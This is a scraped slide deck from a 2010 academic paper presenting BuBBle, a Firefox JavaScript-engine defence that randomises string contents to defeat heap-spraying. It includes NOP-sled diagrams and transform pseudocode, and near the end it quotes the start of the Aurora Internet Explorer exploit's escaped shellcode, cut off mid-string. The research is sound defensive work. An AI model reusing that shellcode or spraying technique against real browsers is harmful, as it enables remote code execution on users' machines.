Upload
francesco-gadaleta
View
901
Download
2
Embed Size (px)
DESCRIPTION
BuBBle: a Javascript engine level countermeasure against heap-spraying attacks Paper accepted and presented @ ESSoS 2010 Pisa (Italy) 3-4-5 February 2010
Citation preview
: a Javascript countermeasure against heap-‐spraying attacks
Francesco Gadaleta -‐ Yves Younan -‐ Wouter Joosen
Katholieke Universiteit Leuven
ESSoS 2010
Pisa 3-‐4 Feb.
Overview
‣ Heap-‐spraying attacks
‣ BuBBle approach
‣ Experiments and Results
‣ Conclusion
A new target: web browsers
A new target: web browsers
A new target: web browsers
Firefox vulnerabilitieshttp://www.mozilla.org/security/known-‐vulnerabilities/firefox35.html
Integer overflow
Memory corruption
Heap buffer overflow in string to number conversion
Crash and remote code execution Flash player unloading
Problem description: the art of spraying the heap
Problem description: the art of spraying the heap
SHELLCODE
0x90 0x90 0x90 0x90 0x90 0x90 0x90 0x90 0x90 0x90 0x90 0x900x90 0x90 0x900x90 0x90 0x90 0x90 0x90 0x900x90 0x90 0x900x90 0x90 0x90 0x90 0x90 0x900x90 0x90 0x900x90 0x90 0x90 0x90 0x90 0x900x90 0x90 0x900x90 0x90 0x90 0x90 0x90 0x90 0x90 0x90 0x900x90 0x90 0x900x90 0x90 0x90 0x90 0x90 0x900x90 0x90 0x900x90 0x90 0x90 0x90 0x90 0x900x90 0x90 0x900x90 0x90 0x90 0x90 0x90 0x900x90 0x90 0x900x90 0x90 0x90 0x90 0x90 0x900x90 0x90 0x900x90 0x90 0x90 0x90 0x90 0x900x90 0x90 0x900x90 0x90 0x90 0x90 0 0x900x90 0x90 0x900x90 0x90 0x90 0x90 0x90 0x900x90 0x90 0x900x90 0x90 0x90 0x90 0x90 0x900x90 0x90 0x900x90 0x90 0x90 0x90 0x9 0x90 0x90 0x90 0x90 0x900x90 0x90 0x900x90 0x90 0x90 0x90 0x90 0x900x90 0x90 0x900x90 0x90 0x90 0x90 0x90 0x900x90 0x90 0x900x90 0x90 0x90 0x90 0x90 0x900x90 0x90 0x900x90 0x90 0x90 0x90 0x90 0x90
Problem description: the art of spraying the heap
sprayed heap
SHELLCODE
0x90 0x90 0x90 0x90 0x90 0x90 0x90 0x90 0x90 0x90 0x90 0x900x90 0x90 0x900x90 0x90 0x90 0x90 0x90 0x900x90 0x90 0x900x90 0x90 0x90 0x90 0x90 0x900x90 0x90 0x900x90 0x90 0x90 0x90 0x90 0x900x90 0x90 0x900x90 0x90 0x90 0x90 0x90 0x90 0x90 0x90 0x900x90 0x90 0x900x90 0x90 0x90 0x90 0x90 0x900x90 0x90 0x900x90 0x90 0x90 0x90 0x90 0x900x90 0x90 0x900x90 0x90 0x90 0x90 0x90 0x900x90 0x90 0x900x90 0x90 0x90 0x90 0x90 0x900x90 0x90 0x900x90 0x90 0x90 0x90 0x90 0x900x90 0x90 0x900x90 0x90 0x90 0x90 0 0x900x90 0x90 0x900x90 0x90 0x90 0x90 0x90 0x900x90 0x90 0x900x90 0x90 0x90 0x90 0x90 0x900x90 0x90 0x900x90 0x90 0x90 0x90 0x9 0x90 0x90 0x90 0x90 0x900x90 0x90 0x900x90 0x90 0x90 0x90 0x90 0x900x90 0x90 0x900x90 0x90 0x90 0x90 0x90 0x900x90 0x90 0x900x90 0x90 0x90 0x90 0x90 0x900x90 0x90 0x900x90 0x90 0x90 0x90 0x90 0x90
SHELLCODE
0x90 0x90 0x90 0x90 0x90 0x90 0x90 0x90 0x90 0x90 0x90 0x900x90 0x90 0x900x90 0x90 0x90 0x90 0x90 0x900x90 0x90 0x900x90 0x90 0x90 0x90 0x90 0x900x90 0x90 0x900x90 0x90 0x90 0x90 0x90 0x900x90 0x90 0x900x90 0x90 0x90 0x90 0x90 0x90 0x90 0x90 0x900x90 0x90 0x900x90 0x90 0x90 0x90 0x90 0x900x90 0x90 0x900x90 0x90 0x90 0x90 0x90 0x900x90 0x90 0x900x90 0x90 0x90 0x90 0x90 0x900x90 0x90 0x900x90 0x90 0x90 0x90 0x90 0x900x90 0x90 0x900x90 0x90 0x90 0x90 0x90 0x900x90 0x90 0x900x90 0x90 0x90 0x90 0 0x900x90 0x90 0x900x90 0x90 0x90 0x90 0x90 0x900x90 0x90 0x900x90 0x90 0x90 0x90 0x90 0x900x90 0x90 0x900x90 0x90 0x90 0x90 0x9 0x90 0x90 0x90 0x90 0x900x90 0x90 0x900x90 0x90 0x90 0x90 0x90 0x900x90 0x90 0x900x90 0x90 0x90 0x90 0x90 0x900x90 0x90 0x900x90 0x90 0x90 0x90 0x90 0x900x90 0x90 0x900x90 0x90 0x90 0x90 0x90 0x90
SHELLCODE
0x90 0x90 0x90 0x90 0x90 0x90 0x90 0x90 0x90 0x90 0x90 0x900x90 0x90 0x900x90 0x90 0x90 0x90 0x90 0x900x90 0x90 0x900x90 0x90 0x90 0x90 0x90 0x900x90 0x90 0x900x90 0x90 0x90 0x90 0x90 0x900x90 0x90 0x900x90 0x90 0x90 0x90 0x90 0x90 0x90 0x90 0x900x90 0x90 0x900x90 0x90 0x90 0x90 0x90 0x900x90 0x90 0x900x90 0x90 0x90 0x90 0x90 0x900x90 0x90 0x900x90 0x90 0x90 0x90 0x90 0x900x90 0x90 0x900x90 0x90 0x90 0x90 0x90 0x900x90 0x90 0x900x90 0x90 0x90 0x90 0x90 0x900x90 0x90 0x900x90 0x90 0x90 0x90 0 0x900x90 0x90 0x900x90 0x90 0x90 0x90 0x90 0x900x90 0x90 0x900x90 0x90 0x90 0x90 0x90 0x900x90 0x90 0x900x90 0x90 0x90 0x90 0x9 0x90 0x90 0x90 0x90 0x900x90 0x90 0x900x90 0x90 0x90 0x90 0x90 0x900x90 0x90 0x900x90 0x90 0x90 0x90 0x90 0x900x90 0x90 0x900x90 0x90 0x90 0x90 0x90 0x900x90 0x90 0x900x90 0x90 0x90 0x90 0x90 0x90 SHELLCODE
0x90 0x90 0x90 0x90 0x90 0x90 0x90 0x90 0x90 0x90 0x90 0x900x90 0x90 0x900x90 0x90 0x90 0x90 0x90 0x900x90 0x90 0x900x90 0x90 0x90 0x90 0x90 0x900x90 0x90 0x900x90 0x90 0x90 0x90 0x90 0x900x90 0x90 0x900x90 0x90 0x90 0x90 0x90 0x90 0x90 0x90 0x900x90 0x90 0x900x90 0x90 0x90 0x90 0x90 0x900x90 0x90 0x900x90 0x90 0x90 0x90 0x90 0x900x90 0x90 0x900x90 0x90 0x90 0x90 0x90 0x900x90 0x90 0x900x90 0x90 0x90 0x90 0x90 0x900x90 0x90 0x900x90 0x90 0x90 0x90 0x90 0x900x90 0x90 0x900x90 0x90 0x90 0x90 0 0x900x90 0x90 0x900x90 0x90 0x90 0x90 0x90 0x900x90 0x90 0x900x90 0x90 0x90 0x90 0x90 0x900x90 0x90 0x900x90 0x90 0x90 0x90 0x9 0x90 0x90 0x90 0x90 0x900x90 0x90 0x900x90 0x90 0x90 0x90 0x90 0x900x90 0x90 0x900x90 0x90 0x90 0x90 0x90 0x900x90 0x90 0x900x90 0x90 0x90 0x90 0x90 0x900x90 0x90 0x900x90 0x90 0x90 0x90 0x90 0x90
SHELLCODE
0x90 0x90 0x90 0x90 0x90 0x90 0x90 0x90 0x90 0x90 0x90 0x900x90 0x90 0x900x90 0x90 0x90 0x90 0x90 0x900x90 0x90 0x900x90 0x90 0x90 0x90 0x90 0x900x90 0x90 0x900x90 0x90 0x90 0x90 0x90 0x900x90 0x90 0x900x90 0x90 0x90 0x90 0x90 0x90 0x90 0x90 0x900x90 0x90 0x900x90 0x90 0x90 0x90 0x90 0x900x90 0x90 0x900x90 0x90 0x90 0x90 0x90 0x900x90 0x90 0x900x90 0x90 0x90 0x90 0x90 0x900x90 0x90 0x900x90 0x90 0x90 0x90 0x90 0x900x90 0x90 0x900x90 0x90 0x90 0x90 0x90 0x900x90 0x90 0x900x90 0x90 0x90 0x90 0 0x900x90 0x90 0x900x90 0x90 0x90 0x90 0x90 0x900x90 0x90 0x900x90 0x90 0x90 0x90 0x90 0x900x90 0x90 0x900x90 0x90 0x90 0x90 0x9 0x90 0x90 0x90 0x90 0x900x90 0x90 0x900x90 0x90 0x90 0x90 0x90 0x900x90 0x90 0x900x90 0x90 0x90 0x90 0x90 0x900x90 0x90 0x900x90 0x90 0x90 0x90 0x90 0x900x90 0x90 0x900x90 0x90 0x90 0x90 0x90 0x90
SHELLCODE
0x90 0x90 0x90 0x90 0x90 0x90 0x90 0x90 0x90 0x90 0x90 0x900x90 0x90 0x900x90 0x90 0x90 0x90 0x90 0x900x90 0x90 0x900x90 0x90 0x90 0x90 0x90 0x900x90 0x90 0x900x90 0x90 0x90 0x90 0x90 0x900x90 0x90 0x900x90 0x90 0x90 0x90 0x90 0x90 0x90 0x90 0x900x90 0x90 0x900x90 0x90 0x90 0x90 0x90 0x900x90 0x90 0x900x90 0x90 0x90 0x90 0x90 0x900x90 0x90 0x900x90 0x90 0x90 0x90 0x90 0x900x90 0x90 0x900x90 0x90 0x90 0x90 0x90 0x900x90 0x90 0x900x90 0x90 0x90 0x90 0x90 0x900x90 0x90 0x900x90 0x90 0x90 0x90 0 0x900x90 0x90 0x900x90 0x90 0x90 0x90 0x90 0x900x90 0x90 0x900x90 0x90 0x90 0x90 0x90 0x900x90 0x90 0x900x90 0x90 0x90 0x90 0x9 0x90 0x90 0x90 0x90 0x900x90 0x90 0x900x90 0x90 0x90 0x90 0x90 0x900x90 0x90 0x900x90 0x90 0x90 0x90 0x90 0x900x90 0x90 0x900x90 0x90 0x90 0x90 0x90 0x900x90 0x90 0x900x90 0x90 0x90 0x90 0x90 0x90
SHELLCODE
0x90 0x90 0x90 0x90 0x90 0x90 0x90 0x90 0x90 0x90 0x90 0x900x90 0x90 0x900x90 0x90 0x90 0x90 0x90 0x900x90 0x90 0x900x90 0x90 0x90 0x90 0x90 0x900x90 0x90 0x900x90 0x90 0x90 0x90 0x90 0x900x90 0x90 0x900x90 0x90 0x90 0x90 0x90 0x90 0x90 0x90 0x900x90 0x90 0x900x90 0x90 0x90 0x90 0x90 0x900x90 0x90 0x900x90 0x90 0x90 0x90 0x90 0x900x90 0x90 0x900x90 0x90 0x90 0x90 0x90 0x900x90 0x90 0x900x90 0x90 0x90 0x90 0x90 0x900x90 0x90 0x900x90 0x90 0x90 0x90 0x90 0x900x90 0x90 0x900x90 0x90 0x90 0x90 0 0x900x90 0x90 0x900x90 0x90 0x90 0x90 0x90 0x900x90 0x90 0x900x90 0x90 0x90 0x90 0x90 0x900x90 0x90 0x900x90 0x90 0x90 0x90 0x9 0x90 0x90 0x90 0x90 0x900x90 0x90 0x900x90 0x90 0x90 0x90 0x90 0x900x90 0x90 0x900x90 0x90 0x90 0x90 0x90 0x900x90 0x90 0x900x90 0x90 0x90 0x90 0x90 0x900x90 0x90 0x900x90 0x90 0x90 0x90 0x90 0x90
SHELLCODE
0x90 0x90 0x90 0x90 0x90 0x90 0x90 0x90 0x90 0x90 0x90 0x900x90 0x90 0x900x90 0x90 0x90 0x90 0x90 0x900x90 0x90 0x900x90 0x90 0x90 0x90 0x90 0x900x90 0x90 0x900x90 0x90 0x90 0x90 0x90 0x900x90 0x90 0x900x90 0x90 0x90 0x90 0x90 0x90 0x90 0x90 0x900x90 0x90 0x900x90 0x90 0x90 0x90 0x90 0x900x90 0x90 0x900x90 0x90 0x90 0x90 0x90 0x900x90 0x90 0x900x90 0x90 0x90 0x90 0x90 0x900x90 0x90 0x900x90 0x90 0x90 0x90 0x90 0x900x90 0x90 0x900x90 0x90 0x90 0x90 0x90 0x900x90 0x90 0x900x90 0x90 0x90 0x90 0 0x900x90 0x90 0x900x90 0x90 0x90 0x90 0x90 0x900x90 0x90 0x900x90 0x90 0x90 0x90 0x90 0x900x90 0x90 0x900x90 0x90 0x90 0x90 0x9 0x90 0x90 0x90 0x90 0x900x90 0x90 0x900x90 0x90 0x90 0x90 0x90 0x900x90 0x90 0x900x90 0x90 0x90 0x90 0x90 0x900x90 0x90 0x900x90 0x90 0x90 0x90 0x90 0x900x90 0x90 0x900x90 0x90 0x90 0x90 0x90 0x90
SHELLCODE
0x90 0x90 0x90 0x90 0x90 0x90 0x90 0x90 0x90 0x90 0x90 0x900x90 0x90 0x900x90 0x90 0x90 0x90 0x90 0x900x90 0x90 0x900x90 0x90 0x90 0x90 0x90 0x900x90 0x90 0x900x90 0x90 0x90 0x90 0x90 0x900x90 0x90 0x900x90 0x90 0x90 0x90 0x90 0x90 0x90 0x90 0x900x90 0x90 0x900x90 0x90 0x90 0x90 0x90 0x900x90 0x90 0x900x90 0x90 0x90 0x90 0x90 0x900x90 0x90 0x900x90 0x90 0x90 0x90 0x90 0x900x90 0x90 0x900x90 0x90 0x90 0x90 0x90 0x900x90 0x90 0x900x90 0x90 0x90 0x90 0x90 0x900x90 0x90 0x900x90 0x90 0x90 0x90 0 0x900x90 0x90 0x900x90 0x90 0x90 0x90 0x90 0x900x90 0x90 0x900x90 0x90 0x90 0x90 0x90 0x900x90 0x90 0x900x90 0x90 0x90 0x90 0x9 0x90 0x90 0x90 0x90 0x900x90 0x90 0x900x90 0x90 0x90 0x90 0x90 0x900x90 0x90 0x900x90 0x90 0x90 0x90 0x90 0x900x90 0x90 0x900x90 0x90 0x90 0x90 0x90 0x900x90 0x90 0x900x90 0x90 0x90 0x90 0x90 0x90
SHELLCODE
0x90 0x90 0x90 0x90 0x90 0x90 0x90 0x90 0x90 0x90 0x90 0x900x90 0x90 0x900x90 0x90 0x90 0x90 0x90 0x900x90 0x90 0x900x90 0x90 0x90 0x90 0x90 0x900x90 0x90 0x900x90 0x90 0x90 0x90 0x90 0x900x90 0x90 0x900x90 0x90 0x90 0x90 0x90 0x90 0x90 0x90 0x900x90 0x90 0x900x90 0x90 0x90 0x90 0x90 0x900x90 0x90 0x900x90 0x90 0x90 0x90 0x90 0x900x90 0x90 0x900x90 0x90 0x90 0x90 0x90 0x900x90 0x90 0x900x90 0x90 0x90 0x90 0x90 0x900x90 0x90 0x900x90 0x90 0x90 0x90 0x90 0x900x90 0x90 0x900x90 0x90 0x90 0x90 0 0x900x90 0x90 0x900x90 0x90 0x90 0x90 0x90 0x900x90 0x90 0x900x90 0x90 0x90 0x90 0x90 0x900x90 0x90 0x900x90 0x90 0x90 0x90 0x9 0x90 0x90 0x90 0x90 0x900x90 0x90 0x900x90 0x90 0x90 0x90 0x90 0x900x90 0x90 0x900x90 0x90 0x90 0x90 0x90 0x900x90 0x90 0x900x90 0x90 0x90 0x90 0x90 0x900x90 0x90 0x900x90 0x90 0x90 0x90 0x90 0x90
SHELLCODE
0x90 0x90 0x90 0x90 0x90 0x90 0x90 0x90 0x90 0x90 0x90 0x900x90 0x90 0x900x90 0x90 0x90 0x90 0x90 0x900x90 0x90 0x900x90 0x90 0x90 0x90 0x90 0x900x90 0x90 0x900x90 0x90 0x90 0x90 0x90 0x900x90 0x90 0x900x90 0x90 0x90 0x90 0x90 0x90 0x90 0x90 0x900x90 0x90 0x900x90 0x90 0x90 0x90 0x90 0x900x90 0x90 0x900x90 0x90 0x90 0x90 0x90 0x900x90 0x90 0x900x90 0x90 0x90 0x90 0x90 0x900x90 0x90 0x900x90 0x90 0x90 0x90 0x90 0x900x90 0x90 0x900x90 0x90 0x90 0x90 0x90 0x900x90 0x90 0x900x90 0x90 0x90 0x90 0 0x900x90 0x90 0x900x90 0x90 0x90 0x90 0x90 0x900x90 0x90 0x900x90 0x90 0x90 0x90 0x90 0x900x90 0x90 0x900x90 0x90 0x90 0x90 0x9 0x90 0x90 0x90 0x90 0x900x90 0x90 0x900x90 0x90 0x90 0x90 0x90 0x900x90 0x90 0x900x90 0x90 0x90 0x90 0x90 0x900x90 0x90 0x900x90 0x90 0x90 0x90 0x90 0x900x90 0x90 0x900x90 0x90 0x90 0x90 0x90 0x90
SHELLCODE
0x90 0x90 0x90 0x90 0x90 0x90 0x90 0x90 0x90 0x90 0x90 0x900x90 0x90 0x900x90 0x90 0x90 0x90 0x90 0x900x90 0x90 0x900x90 0x90 0x90 0x90 0x90 0x900x90 0x90 0x900x90 0x90 0x90 0x90 0x90 0x900x90 0x90 0x900x90 0x90 0x90 0x90 0x90 0x90 0x90 0x90 0x900x90 0x90 0x900x90 0x90 0x90 0x90 0x90 0x900x90 0x90 0x900x90 0x90 0x90 0x90 0x90 0x900x90 0x90 0x900x90 0x90 0x90 0x90 0x90 0x900x90 0x90 0x900x90 0x90 0x90 0x90 0x90 0x900x90 0x90 0x900x90 0x90 0x90 0x90 0x90 0x900x90 0x90 0x900x90 0x90 0x90 0x90 0 0x900x90 0x90 0x900x90 0x90 0x90 0x90 0x90 0x900x90 0x90 0x900x90 0x90 0x90 0x90 0x90 0x900x90 0x90 0x900x90 0x90 0x90 0x90 0x9 0x90 0x90 0x90 0x90 0x900x90 0x90 0x900x90 0x90 0x90 0x90 0x90 0x900x90 0x90 0x900x90 0x90 0x90 0x90 0x90 0x900x90 0x90 0x900x90 0x90 0x90 0x90 0x90 0x900x90 0x90 0x900x90 0x90 0x90 0x90 0x90 0x90
SHELLCODE
0x90 0x90 0x90 0x90 0x90 0x90 0x90 0x90 0x90 0x90 0x90 0x900x90 0x90 0x900x90 0x90 0x90 0x90 0x90 0x900x90 0x90 0x900x90 0x90 0x90 0x90 0x90 0x900x90 0x90 0x900x90 0x90 0x90 0x90 0x90 0x900x90 0x90 0x900x90 0x90 0x90 0x90 0x90 0x90 0x90 0x90 0x900x90 0x90 0x900x90 0x90 0x90 0x90 0x90 0x900x90 0x90 0x900x90 0x90 0x90 0x90 0x90 0x900x90 0x90 0x900x90 0x90 0x90 0x90 0x90 0x900x90 0x90 0x900x90 0x90 0x90 0x90 0x90 0x900x90 0x90 0x900x90 0x90 0x90 0x90 0x90 0x900x90 0x90 0x900x90 0x90 0x90 0x90 0 0x900x90 0x90 0x900x90 0x90 0x90 0x90 0x90 0x900x90 0x90 0x900x90 0x90 0x90 0x90 0x90 0x900x90 0x90 0x900x90 0x90 0x90 0x90 0x9 0x90 0x90 0x90 0x90 0x900x90 0x90 0x900x90 0x90 0x90 0x90 0x90 0x900x90 0x90 0x900x90 0x90 0x90 0x90 0x90 0x900x90 0x90 0x900x90 0x90 0x90 0x90 0x90 0x900x90 0x90 0x900x90 0x90 0x90 0x90 0x90 0x90
SHELLCODE
0x90 0x90 0x90 0x90 0x90 0x90 0x90 0x90 0x90 0x90 0x90 0x900x90 0x90 0x900x90 0x90 0x90 0x90 0x90 0x900x90 0x90 0x900x90 0x90 0x90 0x90 0x90 0x900x90 0x90 0x900x90 0x90 0x90 0x90 0x90 0x900x90 0x90 0x900x90 0x90 0x90 0x90 0x90 0x90 0x90 0x90 0x900x90 0x90 0x900x90 0x90 0x90 0x90 0x90 0x900x90 0x90 0x900x90 0x90 0x90 0x90 0x90 0x900x90 0x90 0x900x90 0x90 0x90 0x90 0x90 0x900x90 0x90 0x900x90 0x90 0x90 0x90 0x90 0x900x90 0x90 0x900x90 0x90 0x90 0x90 0x90 0x900x90 0x90 0x900x90 0x90 0x90 0x90 0 0x900x90 0x90 0x900x90 0x90 0x90 0x90 0x90 0x900x90 0x90 0x900x90 0x90 0x90 0x90 0x90 0x900x90 0x90 0x900x90 0x90 0x90 0x90 0x9 0x90 0x90 0x90 0x90 0x900x90 0x90 0x900x90 0x90 0x90 0x90 0x90 0x900x90 0x90 0x900x90 0x90 0x90 0x90 0x90 0x900x90 0x90 0x900x90 0x90 0x90 0x90 0x90 0x900x90 0x90 0x900x90 0x90 0x90 0x90 0x90 0x90
SHELLCODE
0x90 0x90 0x90 0x90 0x90 0x90 0x90 0x90 0x90 0x90 0x90 0x900x90 0x90 0x900x90 0x90 0x90 0x90 0x90 0x900x90 0x90 0x900x90 0x90 0x90 0x90 0x90 0x900x90 0x90 0x900x90 0x90 0x90 0x90 0x90 0x900x90 0x90 0x900x90 0x90 0x90 0x90 0x90 0x90 0x90 0x90 0x900x90 0x90 0x900x90 0x90 0x90 0x90 0x90 0x900x90 0x90 0x900x90 0x90 0x90 0x90 0x90 0x900x90 0x90 0x900x90 0x90 0x90 0x90 0x90 0x900x90 0x90 0x900x90 0x90 0x90 0x90 0x90 0x900x90 0x90 0x900x90 0x90 0x90 0x90 0x90 0x900x90 0x90 0x900x90 0x90 0x90 0x90 0 0x900x90 0x90 0x900x90 0x90 0x90 0x90 0x90 0x900x90 0x90 0x900x90 0x90 0x90 0x90 0x90 0x900x90 0x90 0x900x90 0x90 0x90 0x90 0x9 0x90 0x90 0x90 0x90 0x900x90 0x90 0x900x90 0x90 0x90 0x90 0x90 0x900x90 0x90 0x900x90 0x90 0x90 0x90 0x90 0x900x90 0x90 0x900x90 0x90 0x90 0x90 0x90 0x900x90 0x90 0x900x90 0x90 0x90 0x90 0x90 0x90
Heap-‐spraying attacks
Assumptions
A buffer overflow/memory corruption vulnerability
Users allowed to allocate memory
Homogeneity of memory
Heap-‐spraying attacks
Assumptions
A buffer overflow/memory corruption vulnerability
Users allowed to allocate memory
Homogeneity of memory
Heap-‐spraying attacks
Assumptions
A buffer overflow/memory corruption vulnerability
Users allowed to allocate memory
Homogeneity of memory
Heap-‐spraying attacks
Assumptions
A buffer overflow/memory corruption vulnerability
Users allowed to allocate memory
Homogeneity of memory
BuBBle approach: Tracemonkey internals
Homogeneity of memory -‐> monolithical data structure
• Javascript Strings
BuBBle approach:the JSString type (Tracemonkey -‐ Mozilla Firefox 3.7)
JSString
mLength
0x90 0x90 0x90 0x90 0x90 0x90 0x90 0x90 0x90 0x90 0x90 0x90 0x90 0x90 0x90 0x90 0x90 0x90 0x90 0x90 0x90 0x90 0x90 0x90 0x90 0x90 0x90 0x90 0x90 0x90 0x90 0x90 0x90 0x90 0x90 0x90 0x90 0x90 0x90 0x90 0x90 0x90 0x90 0x90 0x90 0x90 0x90 0x90 0x90 0x90
mChars
Tracemonkey internals
BuBBle approach:the JSString type (Tracemonkey -‐ Mozilla Firefox 3.7)
JSString
mLength
0x90 0x90 0x90 0x90 0x90 0x90 0x90 0x90 0x90 0x90 0x90 0x90 0x90 0x90 0x90 0x90 0x90 0x90 0x90 0x90 0x90 0x90 0x90 0x90 0x90 0x90 0x90 0x90 0x90 0x90 0x90 0x90 0x90 0x90 0x90 0x90 0x90 0x90 0x90 0x90 0x90 0x90 0x90 0x90 0x90 0x90 0x90 0x90 0x90 0x90
mChars
SHELLCODE
0x90 0x90 0x90 0x90 0x90 0x90 0x90 0x90 0x90 0x90 0x90 0x900x90 0x90 0x900x90 0x90 0x90 0x90 0x90 0x900x90 0x90 0x900x90 0x90 0x90 0x90 0x90 0x900x90 0x90 0x900x90 0x90 0x90 0x90 0x90 0x900x90 0x90 0x900x90 0x90 0x90 0x90 0x90 0x90 0x90 0x90 0x900x90 0x90 0x900x90 0x90 0x90 0x90 0x90 0x900x90 0x90 0x900x90 0x90 0x90 0x90 0x90 0x900x90 0x90 0x900x90 0x90 0x90 0x90 0x90 0x900x90 0x90 0x900x90 0x90 0x90 0x90 0x90 0x900x90 0x90 0x900x90 0x90 0x90 0x90 0x90 0x900x90 0x90 0x900x90 0x90 0x90 0x90 0 0x900x90 0x90 0x900x90 0x90 0x90 0x90 0x90 0x900x90 0x90 0x900x90 0x90 0x90 0x90 0x90 0x900x90 0x90 0x900x90 0x90 0x90 0x90 0x9 0x90 0x90 0x90 0x90 0x900x90 0x90 0x900x90 0x90 0x90 0x90 0x90 0x900x90 0x90 0x900x90 0x90 0x90 0x90 0x90 0x900x90 0x90 0x900x90 0x90 0x90 0x90 0x90 0x900x90 0x90 0x900x90 0x90 0x90 0x90 0x90 0x90
Tracemonkey internals
BuBBle approach
• Introduce diversity in contiguous blocks of memory
• transform Javascript strings (internal structure)
approachHi. I am a dangerous string to jump into a shellcode
Transform
Hi. I am a dangerous string to jump into a shellcode
approachHi. I am a dangerous string to jump into a shellcode
Transform
Hi. I am a dangerous string to jump into a shellcode
Restore
Hi. I am a dangerous string to jump into a shellcode
approachHi. I am a dangerous string to jump into a shellcode
Transform
Hi. I am a dangerous string to jump into a shellcode
Restore
Hi. I am a dangerous string to jump into a shellcode
<Define string>
approachHi. I am a dangerous string to jump into a shellcode
Transform
Hi. I am a dangerous string to jump into a shellcode
Restore
Hi. I am a dangerous string to jump into a shellcode
<Define string>
approachHi. I am a dangerous string to jump into a shellcode
Transform
Hi. I am a dangerous string to jump into a shellcode
Restore
Hi. I am a dangerous string to jump into a shellcode
<Define string>
<Use string>
approachHi. I am a dangerous string to jump into a shellcode
Transform
Hi. I am a dangerous string to jump into a shellcode
Restore
Hi. I am a dangerous string to jump into a shellcode
<Define string>
<Use string>
<support data structure>
BuBBle approach: support data
• Interrupt array of characters
• Change characters at random positions: how many?
• Save support data
BuBBle approach: support data
Num. intervals
Pos. 1st char
Value 1st char
Pos. 2nd char
Value 2nd char
...
• Interrupt array of characters
• Change characters at random positions: how many?
• Save support data
rand <- generate_random_position(0,MINLEN)
len <- string.length()
intervals <- len/MINLEN
foreach (i in intervals)
pos = MINLEN*i
save_position(pos+rand)save_value(character[pos+rand])
change_value(character[pos + rand])
BuBBle approach: js_Transform()
128
“blah blah blah is a normal string with appended shellcode”
len = 57
intervals = 2
7 35a w2
“blah bl0xCCh blah is a normal string 0xCCith appended shellcode”
rand <-
rand <- generate_random_position(0,MINLEN)
len <- string.length()
intervals <- len/MINLEN
foreach (i in intervals)
pos = MINLEN*i
save_position(pos+rand)save_value(character[pos+rand])
change_value(character[pos + rand])
BuBBle approach: js_Transform()
128
“blah blah blah is a normal string with appended shellcode”
len = 57
intervals = 2
7 35a w2
“blah bl0xCCh blah is a normal string 0xCCith appended shellcode”
rand <-
rand <- generate_random_position(0,MINLEN)
len <- string.length()
intervals <- len/MINLEN
foreach (i in intervals)
pos = MINLEN*i
save_position(pos+rand)save_value(character[pos+rand])
change_value(character[pos + rand])
BuBBle approach: js_Transform()
128
“blah blah blah is a normal string with appended shellcode”
len = 57
intervals = 2
7 35a w2
“blah bl0xCCh blah is a normal string 0xCCith appended shellcode”
rand <-
rand <- generate_random_position(0,MINLEN)
len <- string.length()
intervals <- len/MINLEN
foreach (i in intervals)
pos = MINLEN*i
save_position(pos+rand)save_value(character[pos+rand])
change_value(character[pos + rand])
BuBBle approach: js_Transform()
128
“blah blah blah is a normal string with appended shellcode”
len = 57
intervals = 2
7 35a w2
“blah bl0xCCh blah is a normal string 0xCCith appended shellcode”
rand <-
rand <- generate_random_position(0,MINLEN)
len <- string.length()
intervals <- len/MINLEN
foreach (i in intervals)
pos = MINLEN*i
save_position(pos+rand)save_value(character[pos+rand])
change_value(character[pos + rand])
BuBBle approach: js_Transform()
128
“blah blah blah is a normal string with appended shellcode”
len = 57
intervals = 2
7 35a w2
“blah bl0xCCh blah is a normal string 0xCCith appended shellcode”
rand <-
BuBBle approach: security evaluation
• What? We still spray the heap!
• Interrupt procedure call
(.byte 0xcc)
• IE and Aurora against Google (Jan 2010)
Aurora-‐Google (1-‐0)<html><script>var sc = unescape("
%u9090%u19ebu4b5bu3390%u90c9%u7b80%ue901%u0175%u66c3%u7bb9%u8004%u0b34%ue2d8%uebfaue805%uffe2%uffffu3931%ud8dbu87d8%u79bcud8e8%ud8d8%u9853%u53d4%uc4a8%u5375%ud0b0%u2f53%ud7b2%u3081%udb59%ud8d8%u3a48%ub020%ueaebud8d8%u8db0%ubdabu8caau9e53%u30d4%uda37%ud8d8%u3053%ud9b2%u3081%udbb9%ud8d8%u213aub7b0%ud8b6%ub0d8%uaaadub5b4%u538cud49eu0830%ud8dau53d8%ub230%u81d9%u9a30%ud8dbu3ad8%ub021%uebb4%ud8eauabb0%ubdb0%u8cb4%u9e53%u30d4%uda69%ud8d8%u3053%ud9b2%u3081%udbfbud8d8%u213au3459%ud9d8%ud8d8%u0453%u1b59%ud858%ud8d8%ud8b2%uc2b2%ub28bu27d8%u9c8eu18ebu5898%udbe4%uadd8%u5121%u485eud8d8%u1fd8%udbdcub984%ubdf6%u9c1fudcdbubda0%ud8d8%u11ebu8989%u8f8bueb89%u5318%u989eu8630%ud8dau5bd8%ud820%u5dd7%ud9a7%ud8d8%ud8b2%ud8b2%udbb2%ud8b2%udab2%ud8b0%ud8d8%u8b18%u9e53%u30fcudae5%ud8d8%u205bud727%u865cud8d9%u51d8%ub89eud8b2%u2788%uf08eu9e51%u3bcu485eud8d8%u1fd8%udbdcuba84%ubdf6%u9c1fudcdbubda0%ud8d8%ud8b2%ud8b2%udab2%ud8b2%ud8b2%ud8b0%ud8d8%u8b98%u9e53%u30fcud923%ud8d8%u205bud727%uc45cud8d9%u51d8%u5c5eud8d8%u51d8%u5446%ud8d8%u53d8%ub89eud8b2%ud8b2%ud8b2%u9e53%u88b8%u8e27%u1fe0%ua89eud8d8%ud8d8%u9e1fud8acud8d8%u59d8%ud81fud8dauebd8%u5303%uc86%ud8b2%u9e55%u88a8%ud8b0%ud8dcu8fd8%uae27%u27b8%udc8eu11ebud861%ud8dcu58d8%ud7a4%u4d27%ud4acua458%u27d7%uacd8%u58ddud7acu4d27%u333au1b53%ud8f5%ud8dcu5bd8%ud820%udba7%u8651%ub2a8%u55d8%uac9eu2788%ua8aeu278fu5c6eud8d8%u27d8%ue88eu3359%udcd8%ud8d8%u235bua7d8%u277dub8aeu8e27%u27ecu5c6eud8d8%u27d8%uec8eu5e53%ud848%ud8d8%u4653%ud854%ud8d8%udc1fu84dbuf6b9%u8bbdu8e27%u53f4%u5466%ud8d8%u53d8%u485eud8d8%u1fd8%udfdcuba84%ubdf6%u3459%ud9d8%ud8d8%u0453%ud8b0%ud8d9%u8bd8%ud8b0%ud8d9%u8fd8%ud8b2%ud8b2%u8e27%u53c4%ueb23%ueb18%u5903%ud834%ud8dau53d8%u5b14%u8c20%ud0a5%uc451%u5bd9%udc18%u2